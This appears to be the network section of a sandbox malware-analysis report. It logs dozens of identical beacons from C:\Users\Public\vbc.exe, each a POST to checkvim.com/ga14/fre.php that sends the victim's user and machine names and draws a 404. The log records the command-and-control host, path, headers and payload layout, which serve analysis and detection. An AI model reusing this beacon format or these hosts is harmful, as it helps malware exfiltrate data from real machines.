                    Sep 28, 2021 06:51:23.950531960 CEST328OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:24.245244026 CEST329INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:35 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    8192.168.2.22491735.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:37.611742973 CEST230OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:37.682476044 CEST230OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:37.968482971 CEST230INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:49 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    80192.168.2.22492455.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:24.517035961 CEST329OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:24.590152979 CEST330OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:24.868451118 CEST330INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:36 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    81192.168.2.22492465.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:25.124484062 CEST331OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:25.192110062 CEST331OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:25.488806963 CEST331INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:36 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    82192.168.2.22492475.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:25.756367922 CEST332OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:25.829303980 CEST332OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:26.115350962 CEST333INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:37 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    83192.168.2.22492485.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:26.383897066 CEST334OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:26.454925060 CEST334OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:26.801507950 CEST334INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:38 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    84192.168.2.22492495.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:27.057486057 CEST335OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:27.125740051 CEST335OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:27.408520937 CEST336INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:38 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    85192.168.2.22492505.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:27.673999071 CEST336OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:27.742503881 CEST337OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:28.019418001 CEST337INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:39 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    86192.168.2.22492515.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:28.260432959 CEST338OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:28.323946953 CEST338OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:28.604408979 CEST338INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:39 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    87192.168.2.22492525.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:28.882332087 CEST339OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:28.952362061 CEST339OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:29.232880116 CEST340INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:40 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    88192.168.2.22492535.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:29.484911919 CEST340OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:29.551780939 CEST341OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:29.838618040 CEST341INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:41 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    89192.168.2.22492545.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:30.105086088 CEST342OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:30.176115990 CEST342OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:30.459973097 CEST342INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:41 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    9192.168.2.22491745.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:38.271241903 CEST231OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:38.345084906 CEST231OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:38.657721996 CEST232INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:49 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    90192.168.2.22492555.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:30.722784042 CEST343OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:30.795753956 CEST343OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:31.087202072 CEST344INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:42 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    91192.168.2.22492565.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:31.353110075 CEST345OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:31.420075893 CEST345OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:31.712104082 CEST345INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:43 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    92192.168.2.22492575.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:31.987026930 CEST346OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:32.056175947 CEST346OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:32.343317986 CEST347INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:43 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    93192.168.2.22492585.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:32.641426086 CEST347OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:32.708349943 CEST348OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:32.997787952 CEST348INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:44 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    94192.168.2.22492595.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:33.247392893 CEST349OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:33.311726093 CEST349OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:33.614151955 CEST349INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:44 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    95192.168.2.22492605.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:33.897537947 CEST350OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:33.965168953 CEST350OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:34.259139061 CEST351INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:45 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    96192.168.2.22492615.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:34.520464897 CEST352OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:34.589071035 CEST352OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:34.880407095 CEST352INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:46 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    97192.168.2.22492625.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:35.158359051 CEST353OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
